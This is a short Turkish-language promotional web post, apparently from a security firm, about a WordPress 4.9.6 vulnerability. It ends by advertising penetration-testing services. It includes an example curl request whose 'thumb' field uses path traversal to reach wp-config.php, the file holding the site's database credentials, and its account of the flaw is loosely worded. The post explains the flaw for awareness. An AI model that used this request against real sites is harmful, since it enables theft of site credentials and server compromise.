Geçtiğimiz aylarda wordpress 4.9.6 sürümünde test edilen bir açık ile, site sunucularında barındırılarn tüm dosyalarım açıldığı tespit edildi. Diğer alt sürümlerde de çalışan bu güvelik açığı tüm wordpress sitelerinin tehdit altında olduğunu gözler önüne serdi. Nedir bu açık?
Sayfanın Cookie bilgilerini kullanarak,
cUrl komutu ile siteye php komutları enjekte edildi. Daha sonra file_get_contents() fonksiyonu kullanılarak ftp dizinindeki her hangi bir dosya ekrana yazdırıldı.
Örnek Komut :
curl -v "http://siteadresi.com/wp-admin/post.php?post=1" -H "Cookie: TTT" -d "action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php"
Eğer worpress siteniz varsa, siber güvenlik testi yaptırmak için bizimle iletişime geçin!